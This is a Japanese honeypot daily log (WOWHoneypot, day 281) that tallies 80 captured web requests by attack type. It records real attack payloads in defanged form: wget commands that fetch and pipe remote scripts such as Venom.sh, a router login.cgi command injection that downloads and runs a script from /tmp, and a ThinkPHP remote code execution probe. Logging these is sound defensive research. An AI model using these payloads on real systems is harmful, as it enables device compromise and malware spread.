WOWHoneypot観察(281日目)
2019/12/22(日)
トータルは80件でした。
ハンティングログは以下です。
156.222.242[.]20 wget hxxp[:]//185.132.53[.]119/Venom.sh |
156.202.255[.]47 wget hxxp[:]//185.132.53[.]119/Venom.sh |
www.virustotal.com
www.virustotal.com
45.189.74[.]190 wget${IFS}-qO-${IFS}hxxp[:]//104.244.75[.]222/b |
www.virustotal.com
www.virustotal.com
件数 | 概要 | リクエスト |
---|---|---|
40 | アクセス | GET / |
11 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
2 | ルータの脆弱性を狙った通信 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp[:]//185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ |
2 | phpMyAdminの調査 | GET /admin-scripts.asp |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
2 | 管理者情報の調査 | GET //admin/config.php?password%5B0%5D=bebydviyx&username=admin |
2 | 不正中継の試み | CONNECT www.baidu.com:443 |
1 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
1 | サイト構成の調査 | GET /sitemap.xml |
1 | クローリング | GET /robots.txt |
1 | phpMyAdminの調査 | GET /phpmyadmin//index.php |
1 | 不明 | GET /?0628182016134805143312 |
1 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
1 | 不正中継の調査 | HEAD hxxp[:]//123.125.114.144/ |
1 | 不正中継の調査 | GET hxxp[:]//www.123cha.com/ |
1 | phpMyAdminの調査 | GET /phpmyadmin |
1 | Silverlightのドメイン間ポリシーファイルの調査 | GET /clientaccesspolicy.xml |
1 | gitの調査 | GET /.git/HEAD |
1 | 不正中継の試み | CONNECT www.ipip.net:443 |
1 | 不正中継の試み | CONNECT cn.bing.com:443 |